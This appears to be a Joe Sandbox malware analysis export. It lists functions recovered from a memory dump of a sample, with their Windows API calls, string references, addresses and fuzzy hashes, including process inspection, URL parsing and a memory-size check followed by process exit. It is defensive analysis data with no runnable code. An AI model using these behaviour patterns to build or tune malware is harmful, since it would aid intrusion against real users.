Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: strtok_s
String ID:
API String ID: 3330995566-0
Opcode ID: e8470283f7a6b71112a1a7991f4c845bace869f54aec819755641ab01ddaa235
Instruction ID: b2f72ab64d8ff9e2ff95d0cab361e3ad96ade1c5d96786102cfa437d751af0f0
Opcode Fuzzy Hash: e8470283f7a6b71112a1a7991f4c845bace869f54aec819755641ab01ddaa235
Instruction Fuzzy Hash: 0501D175A40229A7CB1A9FA0ED45BED7B78FF10706F215025F801E7240E7789E858BE5

Function 008348F7 Relevance: 6.0, APIs: 4, Instructions: 40stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000), ref: 00834909
GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 00834924
CloseHandle.KERNEL32(00000000), ref: 0083492B
lstrcpy.KERNEL32(00000000,?), ref: 0083495E

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
String ID:
API String ID: 4028989146-0
Opcode ID: 029c60a11133292b78579776ac8f662a47e1db9485ded8d9746e7aa4106313b1
Instruction ID: 67e31fccded6423b8c9f57202343b9400158b8061a354ccc971c96883a2778e1
Opcode Fuzzy Hash: 029c60a11133292b78579776ac8f662a47e1db9485ded8d9746e7aa4106313b1
Instruction Fuzzy Hash: 76F0F6F19016156BEB21ABB49C49BEABFA8FF55310F0014A4FE84D7190DBF498848BE4

Function 00837787 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(------,00815E52), ref: 00837792
lstrcpy.KERNEL32(00000000), ref: 008377B6
lstrcat.KERNEL32(?,------), ref: 008377C0

Strings

------, xrefs: 00837789, 008377BE

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcatlstrcpylstrlen
String ID: ------
API String ID: 3050337572-882505780
Opcode ID: adc57774bd4793d8eea96f035dc7f85e9a30f09413a88c1a063c923ae78d1415
Instruction ID: 7e16d32b550c11af25f8b6b45bfd0f84eb36211e5f9806836ded688718e01e74
Opcode Fuzzy Hash: adc57774bd4793d8eea96f035dc7f85e9a30f09413a88c1a063c923ae78d1415
Instruction Fuzzy Hash: E4F0C0B49057029FDB349F35D888A26BBF9FF85B01714881DA896C7614E734D840CFA0

Function 00823787 Relevance: 5.5, APIs: 4, Instructions: 486stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00811797: lstrcpy.KERNEL32(00000000,?), ref: 008117BE
Part of subcall function 00811797: lstrcpy.KERNEL32(00000000,?), ref: 008117E0
Part of subcall function 00811797: lstrcpy.KERNEL32(00000000,?), ref: 00811802
Part of subcall function 00811797: lstrcpy.KERNEL32(00000000,?), ref: 00811866

lstrcpy.KERNEL32(00000000,?), ref: 008237D9
lstrcpy.KERNEL32(00000000,?), ref: 00823802
lstrcpy.KERNEL32(00000000,?), ref: 00823828
lstrcpy.KERNEL32(00000000,?), ref: 0082384E

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 1e9be69b6d1d964f5a35dcc0e79b14959f9aa6a02d672a7784e4edeb24e27305
Instruction ID: 2185af55abfa8aa3b76e729757e335271a0bdcaa1464708961279b888cde121e
Opcode Fuzzy Hash: 1e9be69b6d1d964f5a35dcc0e79b14959f9aa6a02d672a7784e4edeb24e27305
Instruction Fuzzy Hash: 8012B770A016218FDB188F19D564B25B7E5FF45728B19C0AEE809DB3A2D776DD82CF80

Function 00408780 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 90COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 004087DC
memcpy.MSVCRT(?,?,00000000,00000000,00407897), ref: 00408822

Part of subcall function 00408980: std::_Xinvalid_argument.LIBCPMT ref: 00408996

Strings

string too long, xrefs: 004087D7

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$memcpy
String ID: string too long
API String ID: 2304785028-2556327735
Opcode ID: 1ec711253458015476fa0fdf246fcdf1831fe10d1430631244de81fbdc863098
Instruction ID: e75b845ac4a54d531e9520b8b17775a39ee458b7094510186484d20565971360
Opcode Fuzzy Hash: 1ec711253458015476fa0fdf246fcdf1831fe10d1430631244de81fbdc863098
Instruction Fuzzy Hash: 0721AE213106508BDB259A6C8E80A2AB3E6AB85701B74093FE4D1D77C6DF79AC40879D

Function 00818AB7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 89COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00818AEA

Part of subcall function 0083A5EA: std::exception::exception.LIBCMT ref: 0083A5FF
Part of subcall function 0083A5EA: __CxxThrowException@8.LIBCMT ref: 0083A614
Part of subcall function 0083A5EA: std::exception::exception.LIBCMT ref: 0083A625

Strings

yxxx, xrefs: 00818B41
yxxx, xrefs: 00818AF4

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: yxxx$yxxx
API String ID: 1823113695-1021751087
Opcode ID: b6d375bd9d7859bbd86cd9656df10d63bac0162cd2838bb1dbda21e5c2292a03
Instruction ID: 86858b7746d5f3811c15dbe42180dda280f101aa5042ff43a2282cb5184aebe7
Opcode Fuzzy Hash: b6d375bd9d7859bbd86cd9656df10d63bac0162cd2838bb1dbda21e5c2292a03
Instruction Fuzzy Hash: 0A3179B5E005159BCB08DF58C89169DB7B5FF98310F148269E915DB344DB34AD41CBD1

Function 00408A60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00408A75

Part of subcall function 0042A383: std::exception::exception.LIBCMT ref: 0042A398
Part of subcall function 0042A383: __CxxThrowException@8.LIBCMT ref: 0042A3AD

memcpy.MSVCRT(?,?,?), ref: 00408ABF

Strings

string too long, xrefs: 00408A70

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Exception@8ThrowXinvalid_argumentmemcpystd::_std::exception::exception
String ID: string too long
API String ID: 2475949303-2556327735
Opcode ID: 1ea38f53a1986befa71b2f14c9c86753e2a733b722ecbf4c63771af5796a1cdd
Instruction ID: 7161fd42a55e92d43a5e45998473509cc6e3c5444d18c1b7783adeed0e280c87
Opcode Fuzzy Hash: 1ea38f53a1986befa71b2f14c9c86753e2a733b722ecbf4c63771af5796a1cdd
Instruction Fuzzy Hash: A821D3317046045BEB20CE6DDA4066EB7A6EBD5320F148A3FE891937C1DF74A9448A98

Function 00835D87 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00835D99

Part of subcall function 0083A5EA: std::exception::exception.LIBCMT ref: 0083A5FF
Part of subcall function 0083A5EA: __CxxThrowException@8.LIBCMT ref: 0083A614
Part of subcall function 0083A5EA: std::exception::exception.LIBCMT ref: 0083A625

std::_Xinvalid_argument.LIBCPMT ref: 00835DAC

Strings

Sec-WebSocket-Version: 13, xrefs: 00835D9E

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
String ID: Sec-WebSocket-Version: 13
API String ID: 963545896-4220314181
Opcode ID: 62403f2fa7b4731f586f5973ae6f6be0f0be052669ed5daed82f98767531f795
Instruction ID: 96df62479e9bae23dc32ee7d72f56adf5fbb71d42c150d27bf2bcfaba03d7f9e
Opcode Fuzzy Hash: 62403f2fa7b4731f586f5973ae6f6be0f0be052669ed5daed82f98767531f795
Instruction Fuzzy Hash: 32118E31304B408BC7318A2CE815B1AB7E1FBD5711F640B7DE091CBA85C761E84183E1

Function 00814E27 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50stringnetworkCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,?), ref: 00814E86
InternetCrackUrlA.WININET(?,00000000), ref: 00814E8E

Strings

<, xrefs: 00814E4E

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlen
String ID: <
API String ID: 1274457161-4251816714
Opcode ID: 83350d63855a898580c196c4f361b3f244a8d67ec79f2e5ffb9c4633858592fb
Instruction ID: fef55a72260e3803e1b37481c54814665e7abcae0af168ed812a5bff39adca25
Opcode Fuzzy Hash: 83350d63855a898580c196c4f361b3f244a8d67ec79f2e5ffb9c4633858592fb
Instruction Fuzzy Hash: DC011771D00218AFDB14DFA8EC45B9EBBA8EB08360F00812AF954E7290EB7459058FD0

Function 00408B80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00408B8F

Part of subcall function 0042A3D0: std::exception::exception.LIBCMT ref: 0042A3E5
Part of subcall function 0042A3D0: __CxxThrowException@8.LIBCMT ref: 0042A3FA

memmove.MSVCRT(?,?,?,?,?,004089B2,00000000,?,?,004087D0,?,00000000,00407897), ref: 00408BC5

Strings

invalid string position, xrefs: 00408B8A

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: Exception@8ThrowXinvalid_argumentmemmovestd::_std::exception::exception
String ID: invalid string position
API String ID: 655285616-1799206989
Opcode ID: f028ea1e87d6ef5ac08bc30147daee1a1170208e71a992f96d283b447fa1bbce
Instruction ID: 251e689e54e62f48c7bad3d43e38cf1f7295a935bb062c6d590f7bc18ba98dac
Opcode Fuzzy Hash: f028ea1e87d6ef5ac08bc30147daee1a1170208e71a992f96d283b447fa1bbce
Instruction Fuzzy Hash: 3D0184703047018BD7258A2CEE9461AB7B6DBC5704B68093EE0D2D7B85DBB8FC42839C

Function 00818977 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0081899E

Part of subcall function 0083A5EA: std::exception::exception.LIBCMT ref: 0083A5FF
Part of subcall function 0083A5EA: __CxxThrowException@8.LIBCMT ref: 0083A614
Part of subcall function 0083A5EA: std::exception::exception.LIBCMT ref: 0083A625

Strings

yxxx, xrefs: 008189A8
yxxx, xrefs: 00818980

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: yxxx$yxxx
API String ID: 1823113695-1021751087
Opcode ID: 06048c700276cc93ff33ce3616ad7d162ee1e11297dd13f9dc071f84c650e282
Instruction ID: 7d1e0b0462b678729d82031b8013cf3980edce88b3e58db09866ca80dbd64136
Opcode Fuzzy Hash: 06048c700276cc93ff33ce3616ad7d162ee1e11297dd13f9dc071f84c650e282
Instruction Fuzzy Hash: E5F09023B040254B8314A47D9C864EFAD4BEBE435032AD722E956DF349EC70ECC295D6

Function 00811327 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32 ref: 00811351
ExitProcess.KERNEL32 ref: 0081137B

Strings

@, xrefs: 00811349

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 803317263-2766056989
Opcode ID: f127fba7727a91b88187df4bdea323de0718f2841fffded282c9bdb05d23b48c
Instruction ID: 94044f987f0753011c47cff70408d13ae0ea3f392a2562923c307dc389df19c5
Opcode Fuzzy Hash: f127fba7727a91b88187df4bdea323de0718f2841fffded282c9bdb05d23b48c
Instruction Fuzzy Hash: C1F0E2701182488BEF146664884D7ADB2DCFF02354F100A2DDEB6C2B94E278C8C0866B

Function 00427679 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMONLIBRARYCODE

Download Yara Rule

APIs

std::exception::operator=.LIBCMT ref: 00427692

Part of subcall function 00427612: std::exception::_Tidy.LIBCMT ref: 00427622
Part of subcall function 00427612: std::exception::_Copy_str.LIBCMT ref: 00427632

Strings

RvB, xrefs: 00427688
PVC, xrefs: 0042767B

Memory Dump Source

Source File: 00000000.00000002.2192566459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2192566459.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2192566459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: std::exception::_$Copy_strTidystd::exception::operator=
String ID: PVC$RvB
API String ID: 2698302428-3672294337
Opcode ID: 3bcccb99a86f891201583defc26f550b7ded3d8e37b933871c58baabc1632d31
Instruction ID: bb51f0ba413812d8853d7eb6890f665a9bd2e51ac6c0f51ff85d0c39d38b05c4
Opcode Fuzzy Hash: 3bcccb99a86f891201583defc26f550b7ded3d8e37b933871c58baabc1632d31
Instruction Fuzzy Hash: 60D0A9322043246BC3201A8AE809B83FF88DB413B6F40882EE5C847300CBB9985087E8

Function 0082C4AF Relevance: 5.1, APIs: 4, Instructions: 86stringCOMMON

Download Yara Rule

APIs

Part of subcall function 008344B7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 008344E4
Part of subcall function 008344B7: lstrcpy.KERNEL32(00000000,?), ref: 00834519

Part of subcall function 00837737: lstrcpy.KERNEL32(00000000), ref: 00837766
Part of subcall function 00837737: lstrcat.KERNEL32(00000000), ref: 00837772

Part of subcall function 00837787: lstrlen.KERNEL32(------,00815E52), ref: 00837792
Part of subcall function 00837787: lstrcpy.KERNEL32(00000000), ref: 008377B6
Part of subcall function 00837787: lstrcat.KERNEL32(?,------), ref: 008377C0

Part of subcall function 008376F7: lstrcpy.KERNEL32(00000000), ref: 00837725

Part of subcall function 008342A7: lstrcpy.KERNEL32(00000000,0042CFF4), ref: 008342DC
Part of subcall function 008342A7: lstrcpy.KERNEL32(00000000,00638AA4), ref: 00834306
Part of subcall function 008342A7: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,008115B5,?,0000001A), ref: 00834310

lstrcpy.KERNEL32(00000000,00000000), ref: 0082C6A2
lstrcat.KERNEL32(00000000), ref: 0082C6AC
lstrcpy.KERNEL32(00000000,00000000), ref: 0082C6DA
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 0082C719

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FolderPathSystemTimelstrlen
String ID:
API String ID: 2910713533-0
Opcode ID: 24b5cf9d3328fae0c45e8d89246218dd751768110a068050fd15e1e67777ade2
Instruction ID: 1170b180ea6dd509d370630b18a5eeb46e3c458bb2d757cfd9010413c84ef063
Opcode Fuzzy Hash: 24b5cf9d3328fae0c45e8d89246218dd751768110a068050fd15e1e67777ade2
Instruction Fuzzy Hash: B6317AB0D002699BCB10EFA8DC85BAD77B5FF54304F1480A9E504E7251DB74AE95CF91

Function 0082C5C0 Relevance: 5.1, APIs: 4, Instructions: 86stringCOMMON

Download Yara Rule

APIs

Part of subcall function 008344B7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 008344E4
Part of subcall function 008344B7: lstrcpy.KERNEL32(00000000,?), ref: 00834519

Part of subcall function 00837737: lstrcpy.KERNEL32(00000000), ref: 00837766
Part of subcall function 00837737: lstrcat.KERNEL32(00000000), ref: 00837772

Part of subcall function 00837787: lstrlen.KERNEL32(------,00815E52), ref: 00837792
Part of subcall function 00837787: lstrcpy.KERNEL32(00000000), ref: 008377B6
Part of subcall function 00837787: lstrcat.KERNEL32(?,------), ref: 008377C0

Part of subcall function 008376F7: lstrcpy.KERNEL32(00000000), ref: 00837725

Part of subcall function 008342A7: lstrcpy.KERNEL32(00000000,0042CFF4), ref: 008342DC
Part of subcall function 008342A7: lstrcpy.KERNEL32(00000000,00638AA4), ref: 00834306
Part of subcall function 008342A7: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,008115B5,?,0000001A), ref: 00834310

lstrcpy.KERNEL32(00000000,00000000), ref: 0082C6A2
lstrcat.KERNEL32(00000000), ref: 0082C6AC
lstrcpy.KERNEL32(00000000,00000000), ref: 0082C6DA
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 0082C719

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FolderPathSystemTimelstrlen
String ID:
API String ID: 2910713533-0
Opcode ID: 622d7effc72a65a41521ee849966122e9710e361ce9a4a245570e78283e83e47
Instruction ID: 0a04bc8752ee0d392928b8910cd4138178844cd271cf9c80839d4777a347c2a3
Opcode Fuzzy Hash: 622d7effc72a65a41521ee849966122e9710e361ce9a4a245570e78283e83e47
Instruction Fuzzy Hash: 87318AB0D002699BCF10EFA8D889BAD77B5FF44304F148069E514E7252DB78AE95CF91

Function 0082C50C Relevance: 5.1, APIs: 4, Instructions: 86stringCOMMON

Download Yara Rule

APIs

Part of subcall function 008344B7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 008344E4
Part of subcall function 008344B7: lstrcpy.KERNEL32(00000000,?), ref: 00834519

Part of subcall function 00837737: lstrcpy.KERNEL32(00000000), ref: 00837766
Part of subcall function 00837737: lstrcat.KERNEL32(00000000), ref: 00837772

Part of subcall function 00837787: lstrlen.KERNEL32(------,00815E52), ref: 00837792
Part of subcall function 00837787: lstrcpy.KERNEL32(00000000), ref: 008377B6
Part of subcall function 00837787: lstrcat.KERNEL32(?,------), ref: 008377C0

Part of subcall function 008376F7: lstrcpy.KERNEL32(00000000), ref: 00837725

Part of subcall function 008342A7: lstrcpy.KERNEL32(00000000,0042CFF4), ref: 008342DC
Part of subcall function 008342A7: lstrcpy.KERNEL32(00000000,00638AA4), ref: 00834306
Part of subcall function 008342A7: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,008115B5,?,0000001A), ref: 00834310

lstrcpy.KERNEL32(00000000,00000000), ref: 0082C6A2
lstrcat.KERNEL32(00000000), ref: 0082C6AC
lstrcpy.KERNEL32(00000000,00000000), ref: 0082C6DA
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 0082C719

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FolderPathSystemTimelstrlen
String ID:
API String ID: 2910713533-0
Opcode ID: f52fef43e8fd79fc25d5e3255afab8c54cb70f48914954c1c3b74fa48db9ae42
Instruction ID: 03833582b34d965e9ead93b0ede8c6c7e0b52d5c8051fbd6a295c612d44fa33d
Opcode Fuzzy Hash: f52fef43e8fd79fc25d5e3255afab8c54cb70f48914954c1c3b74fa48db9ae42
Instruction Fuzzy Hash: FA3178B1E002699BCB10EFA8DC85BAD77B5FF50304F1480A9E504E7251DB78AE95CF82

Function 0082C569 Relevance: 5.1, APIs: 4, Instructions: 86stringCOMMON

Download Yara Rule

APIs

Part of subcall function 008344B7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 008344E4
Part of subcall function 008344B7: lstrcpy.KERNEL32(00000000,?), ref: 00834519

Part of subcall function 00837737: lstrcpy.KERNEL32(00000000), ref: 00837766
Part of subcall function 00837737: lstrcat.KERNEL32(00000000), ref: 00837772

Part of subcall function 00837787: lstrlen.KERNEL32(------,00815E52), ref: 00837792
Part of subcall function 00837787: lstrcpy.KERNEL32(00000000), ref: 008377B6
Part of subcall function 00837787: lstrcat.KERNEL32(?,------), ref: 008377C0

Part of subcall function 008376F7: lstrcpy.KERNEL32(00000000), ref: 00837725

Part of subcall function 008342A7: lstrcpy.KERNEL32(00000000,0042CFF4), ref: 008342DC
Part of subcall function 008342A7: lstrcpy.KERNEL32(00000000,00638AA4), ref: 00834306
Part of subcall function 008342A7: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,008115B5,?,0000001A), ref: 00834310

lstrcpy.KERNEL32(00000000,00000000), ref: 0082C6A2
lstrcat.KERNEL32(00000000), ref: 0082C6AC
lstrcpy.KERNEL32(00000000,00000000), ref: 0082C6DA
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 0082C719

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FolderPathSystemTimelstrlen
String ID:
API String ID: 2910713533-0
Opcode ID: 46537bf8aa299a403606b54fdf514bfe0f4d0ce6ecdd97030af697d0db481e08
Instruction ID: d0d057aafa3ae41673652b791cf36658fc58aacc88b74311c6096f797cca1b32
Opcode Fuzzy Hash: 46537bf8aa299a403606b54fdf514bfe0f4d0ce6ecdd97030af697d0db481e08
Instruction Fuzzy Hash: BB3178B0D0026A9BCB14EFA8DC85AAD77B5FF40304F148069E505E7251DB78AE95CF81

Function 0082C614 Relevance: 5.1, APIs: 4, Instructions: 85stringCOMMON

Download Yara Rule

APIs

Part of subcall function 008344B7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 008344E4
Part of subcall function 008344B7: lstrcpy.KERNEL32(00000000,?), ref: 00834519

Part of subcall function 00837737: lstrcpy.KERNEL32(00000000), ref: 00837766
Part of subcall function 00837737: lstrcat.KERNEL32(00000000), ref: 00837772

Part of subcall function 00837787: lstrlen.KERNEL32(------,00815E52), ref: 00837792
Part of subcall function 00837787: lstrcpy.KERNEL32(00000000), ref: 008377B6
Part of subcall function 00837787: lstrcat.KERNEL32(?,------), ref: 008377C0

Part of subcall function 008376F7: lstrcpy.KERNEL32(00000000), ref: 00837725

Part of subcall function 008342A7: lstrcpy.KERNEL32(00000000,0042CFF4), ref: 008342DC
Part of subcall function 008342A7: lstrcpy.KERNEL32(00000000,00638AA4), ref: 00834306
Part of subcall function 008342A7: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,008115B5,?,0000001A), ref: 00834310

lstrcpy.KERNEL32(00000000,00000000), ref: 0082C6A2
lstrcat.KERNEL32(00000000), ref: 0082C6AC
lstrcpy.KERNEL32(00000000,00000000), ref: 0082C6DA
lstrcpy.KERNEL32(00000000,0042CFF4), ref: 0082C719

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FolderPathSystemTimelstrlen
String ID:
API String ID: 2910713533-0
Opcode ID: 6f5709e280dc5b66a845d9763e97af322c35ce3dbc48c25b30e692c72c51b1bb
Instruction ID: 10a2daa2c18c037cc823585984e04cbdf5edd4eceb221e6c464b5594d55d2ce2
Opcode Fuzzy Hash: 6f5709e280dc5b66a845d9763e97af322c35ce3dbc48c25b30e692c72c51b1bb
Instruction Fuzzy Hash: A53158B1E002699BCB10EFA8DC85AAD77B5FF40304F1480A9E504EB251DB749E95CF92

Function 008319A7 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000), ref: 008319D8
lstrcpy.KERNEL32(00000000,?), ref: 00831A10
lstrcpy.KERNEL32(00000000,?), ref: 00831A48
lstrcpy.KERNEL32(00000000,?), ref: 00831A80

Memory Dump Source

Source File: 00000000.00000002.2192797570.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_X4roU7TtF1.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 80d4689b917c98280545ae21ecec45d4bdb4df8f3cf95346bd8f9ad76fc87c25
Instruction ID: ce2c5737474152d91dbb01316467225057f0db024f86b05dfff7c4d9675f2259
Opcode Fuzzy Hash: 80d4689b917c98280545ae21ecec45d4bdb4df8f3cf95346bd8f9ad76fc87c25
Instruction Fuzzy Hash: 2C21DBB4601B029BDB28DF2AC998A16B7E9FF44701B04491CA896C7A41EB74E850CBE1

Function 00811797 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00811877: lstrcpy.KERNEL32(00000000), ref: 00811894
Part of subcall function 00811877: lstrcpy.KERNEL32(00000000,?), ref: 008118B6
Part of subcall function 00811877: lstrcpy.KERNEL32(00000000,?), ref: 008118D8
Part of subcall function 00811877: lstrcpy.KERNEL32(00000000,?), ref: 008118FA

lstrcpy.KERNEL32(00000000,?), ref: 008117BE
lstrcpy.KERNEL32(00000000,?), ref: 008117E0
lstrcpy.KERNEL32(00000000,?), ref: 00811802
